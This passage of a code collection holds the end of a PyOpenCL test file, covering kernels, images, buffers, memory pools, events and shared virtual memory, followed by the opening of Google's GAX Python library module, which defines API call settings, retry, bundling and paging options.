raise RuntimeError("invalid kernel name did not cause error")
except AttributeError:
pass
except RuntimeError:
if "Intel" in device.platform.vendor:
from pytest import xfail
xfail("weird exception from OpenCL implementation "
"on invalid kernel name--are you using "
"Intel's implementation? (if so, known bug in Intel CL)")
else:
raise
def test_image_format_constructor():
# doesn't need image support to succeed
iform = cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT)
assert iform.channel_order == cl.channel_order.RGBA
assert iform.channel_data_type == cl.channel_type.FLOAT
assert not iform.__dict__
def test_device_topology_amd_constructor():
# doesn't need cl_amd_device_attribute_query support to succeed
topol = cl.DeviceTopologyAmd(3, 4, 5)
assert topol.bus == 3
assert topol.device == 4
assert topol.function == 5
assert not topol.__dict__
def test_nonempty_supported_image_formats(ctx_factory):
context = ctx_factory()
device = context.devices[0]
if device.image_support:
assert len(cl.get_supported_image_formats(
context, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)) > 0
else:
from pytest import skip
skip("images not supported on %s" % device.name)
def test_that_python_args_fail(ctx_factory):
context = ctx_factory()
prg = cl.Program(context, """
__kernel void mult(__global float *a, float b, int c)
{ a[get_global_id(0)] *= (b+c); }
""").build()
a = np.random.rand(50000)
queue = cl.CommandQueue(context)
mf = cl.mem_flags
a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a)
knl = cl.Kernel(prg, "mult")
try:
knl(queue, a.shape, None, a_buf, 2, 3)
assert False, "PyOpenCL should not accept bare Python types as arguments"
except cl.LogicError:
pass
try:
prg.mult(queue, a.shape, None, a_buf, float(2), 3)
assert False, "PyOpenCL should not accept bare Python types as arguments"
except cl.LogicError:
pass
prg.mult(queue, a.shape, None, a_buf, np.float32(2), np.int32(3))
a_result = np.empty_like(a)
cl.enqueue_read_buffer(queue, a_buf, a_result).wait()
def test_image_2d(ctx_factory):
context = ctx_factory()
device, = context.devices
if not device.image_support:
from pytest import skip
skip("images not supported on %s" % device)
if "Intel" in device.vendor and "31360.31426" in device.version:
from pytest import skip
skip("images crashy on %s" % device)
_skip_if_pocl(device.platform, 'pocl does not support CL_ADDRESS_CLAMP')
prg = cl.Program(context, """
__kernel void copy_image(
__global float *dest,
__read_only image2d_t src,
sampler_t samp,
int stride0)
{
int d0 = get_global_id(0);
int d1 = get_global_id(1);
/*
const sampler_t samp =
CLK_NORMALIZED_COORDS_FALSE
| CLK_ADDRESS_CLAMP
| CLK_FILTER_NEAREST;
*/
dest[d0*stride0 + d1] = read_imagef(src, samp, (float2)(d1, d0)).x;
}
""").build()
num_channels = 1
a = np.random.rand(1024, 512, num_channels).astype(np.float32)
if num_channels == 1:
a = a[:, :, 0]
queue = cl.CommandQueue(context)
try:
a_img = cl.image_from_array(context, a, num_channels)
except cl.RuntimeError:
import sys
exc = sys.exc_info()[1]
if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED:
from pytest import skip
skip("required image format not supported on %s" % device.name)
else:
raise
a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes)
samp = cl.Sampler(context, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
prg.copy_image(queue, a.shape, None, a_dest, a_img, samp,
np.int32(a.strides[0]/a.dtype.itemsize))
a_result = np.empty_like(a)
cl.enqueue_copy(queue, a_result, a_dest)
good = la.norm(a_result - a) == 0
if not good:
if queue.device.type & cl.device_type.CPU:
assert good, ("The image implementation on your CPU CL platform '%s' "
"returned bad values. This is bad, but common."
% queue.device.platform)
else:
assert good
def test_image_3d(ctx_factory):
#test for image_from_array for 3d image of float2
context = ctx_factory()
device, = context.devices
if not device.image_support:
from pytest import skip
skip("images not supported on %s" % device)
if device.platform.vendor == "Intel(R) Corporation":
from pytest import skip
skip("images crashy on %s" % device)
_skip_if_pocl(device.platform, 'pocl does not support CL_ADDRESS_CLAMP')
prg = cl.Program(context, """
__kernel void copy_image_plane(
__global float2 *dest,
__read_only image3d_t src,
sampler_t samp,
int stride0,
int stride1)
{
int d0 = get_global_id(0);
int d1 = get_global_id(1);
int d2 = get_global_id(2);
/*
const sampler_t samp =
CLK_NORMALIZED_COORDS_FALSE
| CLK_ADDRESS_CLAMP
| CLK_FILTER_NEAREST;
*/
dest[d0*stride0 + d1*stride1 + d2] = read_imagef(
src, samp, (float4)(d2, d1, d0, 0)).xy;
}
""").build()
num_channels = 2
shape = (3, 4, 2)
a = np.random.random(shape + (num_channels,)).astype(np.float32)
queue = cl.CommandQueue(context)
try:
a_img = cl.image_from_array(context, a, num_channels)
except cl.RuntimeError:
import sys
exc = sys.exc_info()[1]
if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED:
from pytest import skip
skip("required image format not supported on %s" % device.name)
else:
raise
a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes)
samp = cl.Sampler(context, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
prg.copy_image_plane(queue, shape, None, a_dest, a_img, samp,
np.int32(a.strides[0]/a.itemsize/num_channels),
np.int32(a.strides[1]/a.itemsize/num_channels),
)
a_result = np.empty_like(a)
cl.enqueue_copy(queue, a_result, a_dest)
good = la.norm(a_result - a) == 0
if not good:
if queue.device.type & cl.device_type.CPU:
assert good, ("The image implementation on your CPU CL platform '%s' "
"returned bad values. This is bad, but common."
% queue.device.platform)
else:
assert good
def test_copy_buffer(ctx_factory):
context = ctx_factory()
queue = cl.CommandQueue(context)
mf = cl.mem_flags
a = np.random.rand(50000).astype(np.float32)
b = np.empty_like(a)
buf1 = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a)
buf2 = cl.Buffer(context, mf.WRITE_ONLY, b.nbytes)
cl.enqueue_copy_buffer(queue, buf1, buf2).wait()
cl.enqueue_read_buffer(queue, buf2, b).wait()
assert la.norm(a - b) == 0
def test_mempool(ctx_factory):
from pyopencl.tools import MemoryPool, ImmediateAllocator
context = ctx_factory()
queue = cl.CommandQueue(context)
pool = MemoryPool(ImmediateAllocator(queue))
alloc_queue = []
e0 = 12
for e in range(e0-6, e0-4):
for i in range(100):
alloc_queue.append(pool.allocate(1 << e))
if len(alloc_queue) > 10:
alloc_queue.pop(0)
del alloc_queue
pool.stop_holding()
def test_mempool_2():
from pyopencl.tools import MemoryPool
from random import randrange
for i in range(2000):
s = randrange(1 << 31) >> randrange(32)
bin_nr = MemoryPool.bin_number(s)
asize = MemoryPool.alloc_size(bin_nr)
assert asize >= s, s
assert MemoryPool.bin_number(asize) == bin_nr, s
assert asize < asize*(1+1/8)
def test_vector_args(ctx_factory):
context = ctx_factory()
queue = cl.CommandQueue(context)
prg = cl.Program(context, """
__kernel void set_vec(float4 x, __global float4 *dest)
{ dest[get_global_id(0)] = x; }
""").build()
x = cl_array.vec.make_float4(1, 2, 3, 4)
dest = np.empty(50000, cl_array.vec.float4)
mf = cl.mem_flags
dest_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=dest)
prg.set_vec(queue, dest.shape, None, x, dest_buf)
cl.enqueue_read_buffer(queue, dest_buf, dest).wait()
assert (dest == x).all()
def test_header_dep_handling(ctx_factory):
context = ctx_factory()
from os.path import exists
assert exists("empty-header.h") # if this fails, change dir to pyopencl/test
kernel_src = """
#include <empty-header.h>
kernel void zonk(global int *a)
{
*a = 5;
}
"""
import os
cl.Program(context, kernel_src).build(["-I", os.getcwd()])
cl.Program(context, kernel_src).build(["-I", os.getcwd()])
def test_context_dep_memoize(ctx_factory):
context = ctx_factory()
from pyopencl.tools import context_dependent_memoize
counter = [0]
@context_dependent_memoize
def do_something(ctx):
counter[0] += 1
do_something(context)
do_something(context)
assert counter[0] == 1
def test_can_build_binary(ctx_factory):
ctx = ctx_factory()
device, = ctx.devices
program = cl.Program(ctx, """
__kernel void simple(__global float *in, __global float *out)
{
out[get_global_id(0)] = in[get_global_id(0)];
}""")
program.build()
binary = program.get_info(cl.program_info.BINARIES)[0]
foo = cl.Program(ctx, [device], [binary])
foo.build()
def test_enqueue_barrier_marker(ctx_factory):
ctx = ctx_factory()
_skip_if_pocl(ctx.devices[0].platform, 'pocl crashes on enqueue_barrier')
queue = cl.CommandQueue(ctx)
cl.enqueue_barrier(queue)
evt1 = cl.enqueue_marker(queue)
evt2 = cl.enqueue_marker(queue, wait_for=[evt1])
cl.enqueue_barrier(queue, wait_for=[evt1, evt2])
def test_wait_for_events(ctx_factory):
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
evt1 = cl.enqueue_marker(queue)
evt2 = cl.enqueue_marker(queue)
cl.wait_for_events([evt1, evt2])
def test_unload_compiler(platform):
if (platform._get_cl_version() < (1, 2) or
cl.get_cl_header_version() < (1, 2)):
from pytest import skip
skip("clUnloadPlatformCompiler is only available in OpenCL 1.2")
_skip_if_pocl(platform, 'pocl does not support unloading compiler')
if platform.vendor == "Intel(R) Corporation":
from pytest import skip
skip("Intel proprietary driver does not support unloading compiler")
cl.unload_platform_compiler(platform)
def test_enqueue_task(ctx_factory):
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
mf = cl.mem_flags
prg = cl.Program(ctx, """
__kernel void
reverse(__global const float *in, __global float *out, int n)
{
for (int i = 0;i < n;i++) {
out[i] = in[n - 1 - i];
}
}
""").build()
knl = prg.reverse
n = 100
a = np.random.rand(n).astype(np.float32)
b = np.empty_like(a)
buf1 = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a)
buf2 = cl.Buffer(ctx, mf.WRITE_ONLY, b.nbytes)
knl.set_args(buf1, buf2, np.int32(n))
cl.enqueue_task(queue, knl)
cl.enqueue_copy(queue, b, buf2).wait()
assert la.norm(a[::-1] - b) == 0
def test_platform_get_devices(ctx_factory):
ctx = ctx_factory()
platform = ctx.devices[0].platform
if platform.name == "Apple":
pytest.xfail("Apple doesn't understand all the values we pass "
"for dev_type")
dev_types = [cl.device_type.ACCELERATOR, cl.device_type.ALL,
cl.device_type.CPU, cl.device_type.DEFAULT, cl.device_type.GPU]
if (platform._get_cl_version() >= (1, 2) and
cl.get_cl_header_version() >= (1, 2)
and not platform.name.lower().startswith("nvidia")):
dev_types.append(cl.device_type.CUSTOM)
for dev_type in dev_types:
print(dev_type)
devs = platform.get_devices(dev_type)
if dev_type in (cl.device_type.DEFAULT,
cl.device_type.ALL,
getattr(cl.device_type, 'CUSTOM', None)):
continue
for dev in devs:
assert dev.type & dev_type == dev_type
def test_user_event(ctx_factory):
ctx = ctx_factory()
if (ctx._get_cl_version() < (1, 1) and
cl.get_cl_header_version() < (1, 1)):
from pytest import skip
skip("UserEvent is only available in OpenCL 1.1")
if ctx.devices[0].platform.name == "Portable Computing Language":
# https://github.com/pocl/pocl/issues/201
pytest.xfail("POCL's user events don't work right")
status = {}
def event_waiter1(e, key):
e.wait()
status[key] = True
def event_waiter2(e, key):
cl.wait_for_events([e])
status[key] = True
from threading import Thread
from time import sleep
evt = cl.UserEvent(ctx)
Thread(target=event_waiter1, args=(evt, 1)).start()
sleep(.05)
if status.get(1, False):
raise RuntimeError('UserEvent triggered before set_status')
evt.set_status(cl.command_execution_status.COMPLETE)
sleep(.05)
if not status.get(1, False):
raise RuntimeError('UserEvent.wait timeout')
assert evt.command_execution_status == cl.command_execution_status.COMPLETE
evt = cl.UserEvent(ctx)
Thread(target=event_waiter2, args=(evt, 2)).start()
sleep(.05)
if status.get(2, False):
raise RuntimeError('UserEvent triggered before set_status')
evt.set_status(cl.command_execution_status.COMPLETE)
sleep(.05)
if not status.get(2, False):
raise RuntimeError('cl.wait_for_events timeout on UserEvent')
assert evt.command_execution_status == cl.command_execution_status.COMPLETE
def test_buffer_get_host_array(ctx_factory):
ctx = ctx_factory()
mf = cl.mem_flags
host_buf = np.random.rand(25).astype(np.float32)
buf = cl.Buffer(ctx, mf.READ_WRITE | mf.USE_HOST_PTR, hostbuf=host_buf)
host_buf2 = buf.get_host_array(25, np.float32)
assert (host_buf == host_buf2).all()
assert (host_buf.__array_interface__['data'][0] ==
host_buf.__array_interface__['data'][0])
assert host_buf2.base is buf
buf = cl.Buffer(ctx, mf.READ_WRITE | mf.ALLOC_HOST_PTR, size=100)
try:
host_buf2 = buf.get_host_array(25, np.float32)
assert False, ("MemoryObject.get_host_array should not accept buffer "
"without USE_HOST_PTR")
except cl.LogicError:
pass
host_buf = np.random.rand(25).astype(np.float32)
buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=host_buf)
try:
host_buf2 = buf.get_host_array(25, np.float32)
assert False, ("MemoryObject.get_host_array should not accept buffer "
"without USE_HOST_PTR")
except cl.LogicError:
pass
def test_program_valued_get_info(ctx_factory):
ctx = ctx_factory()
prg = cl.Program(ctx, """
__kernel void
reverse(__global float *out)
{
out[get_global_id(0)] *= 2;
}
""").build()
knl = prg.reverse
assert knl.program == prg
knl.program.binaries[0]
def test_event_set_callback(ctx_factory):
import sys
if sys.platform.startswith("win"):
pytest.xfail("Event.set_callback not present on Windows")
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
if ctx._get_cl_version() < (1, 1):
pytest.skip("OpenCL 1.1 or newer required fro set_callback")
a_np = np.random.rand(50000).astype(np.float32)
b_np = np.random.rand(50000).astype(np.float32)
got_called = []
def cb(status):
got_called.append(status)
mf = cl.mem_flags
a_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a_np)
b_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=b_np)
prg = cl.Program(ctx, """
__kernel void sum(__global const float *a_g, __global const float *b_g,
__global float *res_g) {
int gid = get_global_id(0);
res_g[gid] = a_g[gid] + b_g[gid];
}
""").build()
res_g = cl.Buffer(ctx, mf.WRITE_ONLY, a_np.nbytes)
uevt = cl.UserEvent(ctx)
evt = prg.sum(queue, a_np.shape, None, a_g, b_g, res_g, wait_for=[uevt])
evt.set_callback(cl.command_execution_status.COMPLETE, cb)
uevt.set_status(cl.command_execution_status.COMPLETE)
queue.finish()
# yuck
from time import sleep
sleep(0.1)
assert got_called
def test_global_offset(ctx_factory):
context = ctx_factory()
queue = cl.CommandQueue(context)
prg = cl.Program(context, """
__kernel void mult(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
n = 50
a = np.random.rand(n).astype(np.float32)
queue = cl.CommandQueue(context)
mf = cl.mem_flags
a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a)
step = 10
for ofs in range(0, n, step):
prg.mult(queue, (step,), None, a_buf, global_offset=(ofs,))
a_2 = np.empty_like(a)
cl.enqueue_copy(queue, a_2, a_buf)
assert (a_2 == 2*a).all()
def test_sub_buffers(ctx_factory):
ctx = ctx_factory()
if (ctx._get_cl_version() < (1, 1) or
cl.get_cl_header_version() < (1, 1)):
from pytest import skip
skip("sub-buffers are only available in OpenCL 1.1")
alignment = ctx.devices[0].mem_base_addr_align
queue = cl.CommandQueue(ctx)
n = 30000
a = (np.random.rand(n) * 100).astype(np.uint8)
mf = cl.mem_flags
a_buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a)
start = (5000 // alignment) * alignment
stop = start + 20 * alignment
a_sub_ref = a[start:stop]
a_sub = np.empty_like(a_sub_ref)
cl.enqueue_copy(queue, a_sub, a_buf[start:stop])
assert np.array_equal(a_sub, a_sub_ref)
def test_spirv(ctx_factory):
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
if (ctx._get_cl_version() < (2, 1) or
cl.get_cl_header_version() < (2, 1)):
from pytest import skip
skip("SPIR-V program creation only available in OpenCL 2.1 and higher")
n = 50000
a_dev = cl.clrandom.rand(queue, n, np.float32)
b_dev = cl.clrandom.rand(queue, n, np.float32)
dest_dev = cl_array.empty_like(a_dev)
with open("add-vectors.spv", "rb") as spv_file:
spv = spv_file.read()
prg = cl.Program(ctx, spv)
prg.sum(queue, a_dev.shape, None, a_dev.data, b_dev.data, dest_dev.data)
assert la.norm((dest_dev - (a_dev+b_dev)).get()) < 1e-7
def test_coarse_grain_svm(ctx_factory):
import sys
is_pypy = '__pypy__' in sys.builtin_module_names
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
if (ctx._get_cl_version() < (2, 0) or
cl.get_cl_header_version() < (2, 0)):
from pytest import skip
skip("SVM only available in OpenCL 2.0 and higher")
dev = ctx.devices[0]
if ("AMD" in dev.platform.name
and dev.type & cl.device_type.CPU):
pytest.xfail("AMD CPU doesn't do coarse-grain SVM")
n = 3000
svm_ary = cl.SVM(cl.csvm_empty(ctx, (n,), np.float32, alignment=64))
if not is_pypy:
# https://bitbucket.org/pypy/numpy/issues/52
assert isinstance(svm_ary.mem.base, cl.SVMAllocation)
if dev.platform.name != "Portable Computing Language":
# pocl 0.13 has a bug misinterpreting the size parameter
cl.enqueue_svm_memfill(queue, svm_ary, np.zeros((), svm_ary.mem.dtype))
with svm_ary.map_rw(queue) as ary:
ary.fill(17)
orig_ary = ary.copy()
prg = cl.Program(ctx, """
__kernel void twice(__global float *a_g)
{
a_g[get_global_id(0)] *= 2;
}
""").build()
prg.twice(queue, svm_ary.mem.shape, None, svm_ary)
with svm_ary.map_ro(queue) as ary:
print(ary)
assert np.array_equal(orig_ary*2, ary)
new_ary = np.empty_like(orig_ary)
new_ary.fill(-1)
if ctx.devices[0].platform.name != "Portable Computing Language":
# "Blocking memcpy is unimplemented (clEnqueueSVMMemcpy.c:61)"
# in pocl 0.13.
cl.enqueue_copy(queue, new_ary, svm_ary)
assert np.array_equal(orig_ary*2, new_ary)
def test_fine_grain_svm(ctx_factory):
import sys
is_pypy = '__pypy__' in sys.builtin_module_names
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
from pytest import skip
if (ctx._get_cl_version() < (2, 0) or
cl.get_cl_header_version() < (2, 0)):
skip("SVM only available in OpenCL 2.0 and higher")
if not (ctx.devices[0].svm_capabilities
& cl.device_svm_capabilities.FINE_GRAIN_BUFFER):
skip("device does not support fine-grain SVM")
n = 3000
ary = cl.fsvm_empty(ctx, n, np.float32, alignment=64)
if not is_pypy:
# https://bitbucket.org/pypy/numpy/issues/52
assert isinstance(ary.base, cl.SVMAllocation)
ary.fill(17)
orig_ary = ary.copy()
prg = cl.Program(ctx, """
__kernel void twice(__global float *a_g)
{
a_g[get_global_id(0)] *= 2;
}
""").build()
prg.twice(queue, ary.shape, None, cl.SVM(ary))
queue.finish()
print(ary)
assert np.array_equal(orig_ary*2, ary)
if __name__ == "__main__":
# make sure that import failures get reported, instead of skipping the tests.
import pyopencl # noqa
import sys
if len(sys.argv) > 1:
exec(sys.argv[1])
else:
from py.test.cmdline import main
main([__file__])
|
__init__.py
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Google API Extensions"""
from __future__ import absolute_import
import collections
import logging
import multiprocessing as mp
import dill
from grpc import RpcError, StatusCode
from google.rpc import code_pb2
from google.gax.errors import GaxError
from google.gax.retry import retryable
__version__ = '0.15.1'
_LOG = logging.getLogger(__name__)
_LOG.addHandler(logging.NullHandler())
_MILLIS_PER_SEC = 1000
INITIAL_PAGE = object()
"""A placeholder for the page token passed into an initial paginated request."""
OPTION_INHERIT = object()
"""Global constant.
If a CallOptions field is set to OPTION_INHERIT, the call to which that
CallOptions belongs will attempt to inherit that field from its default
settings."""
class _CallSettings(object):
"""Encapsulates the call settings for an API call."""
# pylint: disable=too-few-public-methods
def __init__(self, timeout=30, retry=None, page_descriptor=None,
page_token=None, bundler=None, bundle_descriptor=None,
kwargs=None):
"""Constructor.
Args:
timeout (int): The client-side timeout for API calls. This
parameter is ignored for retrying calls.
retry (:class:`RetryOptions`): The configuration for retrying upon
transient error. If set to None, this call will not retry.
page_descriptor (:class:`PageDescriptor`): indicates the structure
of page streaming to be performed. If set to None, page streaming
is disabled.
page_token (str): If there is no ``page_descriptor``, this attribute
has no meaning. Otherwise, determines the page token used in the
page streaming request.
bundler (:class:`gax.bundling.Executor`): orchestrates bundling. If
None, bundling is not performed.
bundle_descriptor (:class:`BundleDescriptor`): indicates the
structure of of the bundle. If None, bundling is disabled.
kwargs (dict): other keyword arguments to be passed to the API
calls.
"""
self.timeout = timeout
self.retry = retry
self.page_descriptor = page_descriptor
self.page_token = page_token
self.bundler = bundler
self.bundle_descriptor = bundle_descriptor
self.kwargs = kwargs or {}
@property
def flatten_pages(self):
"""
A boolean property indicating whether a page streamed response should
make the page structure transparent to the user by flattening the
repeated field in the returned iterator.
There is no ``page_descriptor``, this means nothing.
"""
return self.page_token is None
def merge(self, options):
"""Returns new _CallSettings merged from this and a CallOptions object.
Note that passing if the CallOptions instance specifies a page_token,
the merged _CallSettings will have ``flatten_pages`` disabled. This
permits toggling per-resource/per-page page streaming.
Args:
options (:class:`CallOptions`): an instance whose values override
those in this object. If None, ``merge`` returns a copy of this
object
Returns:
A :class:`_CallSettings` object.
"""
if not options:
return _CallSettings(
timeout=self.timeout, retry=self.retry,
page_descriptor=self.page_descriptor,
page_token=self.page_token,
bundler=self.bundler, bundle_descriptor=self.bundle_descriptor,
kwargs=self.kwargs)
else:
if options.timeout == OPTION_INHERIT:
timeout = self.timeout
else:
timeout = options.timeout
if options.retry == OPTION_INHERIT:
retry = self.retry
else:
retry = options.retry
if options.page_token == OPTION_INHERIT:
page_token = self.page_token
else:
page_token = options.page_token
if options.is_bundling:
bundler = self.bundler
else:
bundler = None
if options.kwargs == OPTION_INHERIT:
kwargs = self.kwargs
else:
kwargs = self.kwargs.copy()
kwargs.update(options.kwargs)
return _CallSettings(
timeout=timeout, retry=retry,
page_descriptor=self.page_descriptor, page_token=page_token,
bundler=bundler, bundle_descriptor=self.bundle_descriptor,
kwargs=kwargs)
class CallOptions(object):
"""Encapsulates the overridable settings for a particular API call.
``CallOptions`` is an optional arg for all GAX API calls. It is used to
configure the settings of a specific API call.
When provided, its values override the GAX service defaults for that
particular call.
"""
# pylint: disable=too-few-public-methods
def __init__(self, timeout=OPTION_INHERIT, retry=OPTION_INHERIT,
page_token=OPTION_INHERIT, is_bundling=False, **kwargs):
"""Constructor.
Example:
>>> # change an api call's timeout
>>> o1 = CallOptions(timeout=30) # make the timeout 30 seconds
>>>
>>> # set page streaming to be per-page on a call where it is
>>> # normally per-resource
>>> o2 = CallOptions(page_token=INITIAL_PAGE)
>>>
>>> # disable retrying on an api call that normally retries
>>> o3 = CallOptions(retry=None)
>>>
>>> # enable bundling on a call that supports it
>>> o4 = CallOptions(is_bundling=True)
Args:
timeout (int): The client-side timeout for non-retrying API calls.
retry (:class:`RetryOptions`): determines whether and how to retry
on transient errors. When set to None, the call will not retry.
page_token (str): If set and the call is configured for page
streaming, page streaming is performed per-page, starting with
this page_token. Use ``INITIAL_PAGE`` for the first request.
If unset and the call is configured for page streaming, page
streaming is performed per-resource.
is_bundling (bool): If set and the call is configured for bundling,
bundling is performed. Bundling is always disabled by default.
"""
if not (timeout == OPTION_INHERIT or retry == OPTION_INHERIT):
raise ValueError('The CallOptions has incompatible settings: '
'"timeout" cannot be specified on a retrying call')
self.timeout = timeout
self.retry = retry
self.page_token = page_token
self.is_bundling = is_bundling
self.kwargs = kwargs or OPTION_INHERIT
class PageDescriptor(
collections.namedtuple(
'PageDescriptor',
['request_page_token_field',
'response_page_token_field',
'resource_field'])):
"""Describes the structure of a page-streaming call."""
pass
class RetryOptions(
collections.namedtuple(
'RetryOptions',
['retry_codes',
'backoff_settings'])):
"""Per-call configurable settings for retrying upon transient failure.
Attributes:
retry_codes (list[string]): a list of Google API canonical error codes
upon which a retry should be attempted.
backoff_settings (:class:`BackoffSettings`): configures the retry
exponential backoff algorithm.
"""
pass
class BackoffSettings(
collections.namedtuple(
'BackoffSettings',
['initial_retry_delay_millis',
'retry_delay_multiplier',
'max_retry_delay_millis',
'initial_rpc_timeout_millis',
'rpc_timeout_multiplier',
'max_rpc_timeout_millis',
'total_timeout_millis'])):
"""Parameters to the exponential backoff algorithm for retrying.
Attributes:
initial_retry_delay_millis: the initial delay time, in milliseconds,
between the completion of the first failed request and the initiation of
the first retrying request.
retry_delay_multiplier: the multiplier by which to increase the delay time
between the completion of failed requests, and the initiation of the
subsequent retrying request.
max_retry_delay_millis: the maximum delay time, in milliseconds, between
requests. When this value is reached, ``retry_delay_multiplier`` will no
longer be used to increase delay time.
initial_rpc_timeout_millis: the initial timeout parameter to the request.
rpc_timeout_multiplier: the multiplier by which to increase the timeout
parameter between failed requests.
max_rpc_timeout_millis: the maximum timeout parameter, in milliseconds,
for a request. When this value is reached, ``rpc_timeout_multiplier``
will no longer be used to increase the timeout.
total_timeout_millis: the total time, in milliseconds, starting from when
the initial request is sent, after which an error will be returned,
regardless of the retrying attempts made meanwhile.
"""
pass
class BundleDescriptor(
collections.namedtuple(
'BundleDescriptor',
['bundled_field',
'request_discriminator_fields',
'subresponse_field'])):
"""Describes the structure of bundled call.
request_discriminator_fields may include '.' as a separator, which is used
to indicate object traversal. This allows fields in nested objects to be
used to determine what requests to bundle.
Attributes:
bundled_field: the repeated field in the request message that
will have its elements aggregated by bundling
request_discriminator_fields: a list of fields in the
target request message class that are used to determine
which messages should be bundled together.
subresponse_field: an optional field, when present it indicates the field
in the response message that should be used to demultiplex the response
into multiple response messages.
"""
def __new__(cls,
bundled_field,
request_discriminator_fields,
subresponse_field=None):
return super(cls, BundleDescriptor).__new__(
cls,
bundled_field,
request_discriminator_fields,
subresponse_field)
class BundleOptions(
collections.namedtuple(
'BundleOptions',
['element_count_threshold',
'element_count_limit',
'request_byte_threshold',
'request_byte_limit',
'delay_threshold'])):
"""Holds values used to configure bundling.
The xxx_threshold attributes are used to configure when the bundled request
should be made.
Attributes:
element_count_threshold: the bundled request will be sent once the
count of outstanding elements in the repeated field reaches this
value.
element_count_limit: represents a hard limit on the number of elements
in the repeated field of the bundle; if adding a request to a bundle
would exceed this value, the bundle is sent and the new request is
added to a fresh bundle. It is invalid for a single request to exceed
this limit.
request_byte_threshold: the bundled request will be sent once the count
of bytes in the request reaches this value. Note that this value is
pessimistically approximated by summing the bytesizes of the elements
in the repeated field, and therefore may be an under-approximation.
request_byte_limit: represents a hard limit on the size of the bundled
request; if adding a request to a bundle would exceed this value, the
bundle is sent and the new request is added to a fresh bundle. It is
invalid for a single request to exceed this limit. Note that this
value is pessimistically approximated by summing the bytesizes of the
elements in the repeated field, with a buffer applied to correspond to
the resulting under-approximation.
delay_threshold: the bundled request will be sent this amount of
time after the first element in the bundle was added to it.
"""
# pylint: disable=too-few-public-methods
def __new__(cls,
element_count_threshold=0,
element_count_limit=0,
request_byte_threshold=0,
request_byte_limit=0,
delay_threshold=0):
"""Invokes the base constructor with default values.
The default values are zero for all attributes and it's necessary to
specify at least one valid threshold value during construction.
Args:
element_count_threshold: the bundled request will be sent once the
count of outstanding elements in the repeated field reaches this
value.
element_count_limit: represents a hard limit on the number of
elements in the repeated field of the bundle; if adding a request
to a bundle would exceed this value, the bundle is sent and the new
request is added to a fresh bundle. It is invalid for a single
request to exceed this limit.
request_byte_threshold: the bundled request will be sent once the
count of bytes in the request reaches this value. Note that this
value is pessimistically approximated by summing the bytesizes of
the elements in the repeated field, with a buffer applied to
compensate for the corresponding under-approximation.
request_byte_limit: represents a hard limit on the size of the
bundled request; if adding a request to a bundle would exceed this
value, the bundle is sent and the new request is added to a fresh
bundle. It is invalid for a single request to exceed this
limit. Note that this value is pessimistically approximated by
summing the bytesizes of the elements in the repeated field, with a
buffer applied to correspond to the resulting under-approximation.
delay_threshold: the bundled request will be sent this amount of
time after the first element in the bundle was added to it.
"""
assert isinstance(element_count_threshold, int), 'should be an int'
assert isinstance(element_count_limit, int), 'should be an int'
assert isinstance(request_byte_threshold, int), 'should be an int'
assert isinstance(request_byte_limit, int), 'should be an int'
assert isinstance(delay_threshold, int), 'should be an int'
assert (element_count_threshold > 0 or
request_byte_threshold > 0 or
delay_threshold > 0), 'one threshold should be > 0'
return super(cls, BundleOptions).__new__(
cls,
element_count_threshold,
element_count_limit,
request_byte_threshold,
request_byte_limit,
delay_threshold)
class PageIterator(object):
"""An iterator over the pages of a page streaming API call.
Provides access to the individual pages of the call, as well as the page
token.
Attributes:
response: The full response message for the call most recently made, or
